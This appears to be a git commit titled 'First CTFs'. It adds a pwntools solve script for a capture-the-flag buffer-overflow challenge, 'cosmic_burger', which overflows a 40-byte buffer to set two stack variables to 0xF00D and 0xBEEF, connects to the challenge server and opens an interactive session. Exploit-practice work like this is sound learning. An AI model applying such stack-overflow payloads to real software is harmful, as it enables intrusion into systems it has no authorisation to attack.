First CTFs
This commit is contained in:
4
BOF/06_cosmic_burger_joint/.gdb_history
Normal file
4
BOF/06_cosmic_burger_joint/.gdb_history
Normal file
@@ -0,0 +1,4 @@
|
||||
run
|
||||
quit
|
||||
disass vuln
|
||||
quit
|
||||
BIN
BOF/06_cosmic_burger_joint/cosmic_burger
Executable file
BIN
BOF/06_cosmic_burger_joint/cosmic_burger
Executable file
Binary file not shown.
23
BOF/06_cosmic_burger_joint/solve.py
Normal file
23
BOF/06_cosmic_burger_joint/solve.py
Normal file
@@ -0,0 +1,23 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
context.binary = elf = ELF("./cosmic_burger", checksec=False)
|
||||
|
||||
p = process(elf.path)
|
||||
p = remote("offsec.m0lecon.it", 13529)
|
||||
# Your exploit here
|
||||
OFFSET = 40
|
||||
# mov eax,DWORD PTR [rbp-0x4]
|
||||
# cmp eax,0xbeef
|
||||
# jne 0x12f2 <vuln+196>
|
||||
# mov eax,DWORD PTR [rbp-0x8]
|
||||
# cmp eax,0xf00d
|
||||
first = 0xBEEF
|
||||
second = 0xF00D
|
||||
payload = flat(
|
||||
b"A" * OFFSET,
|
||||
p32(second),
|
||||
p32(first),
|
||||
)
|
||||
p.send(payload)
|
||||
p.interactive()
|
||||
Reference in New Issue
Block a user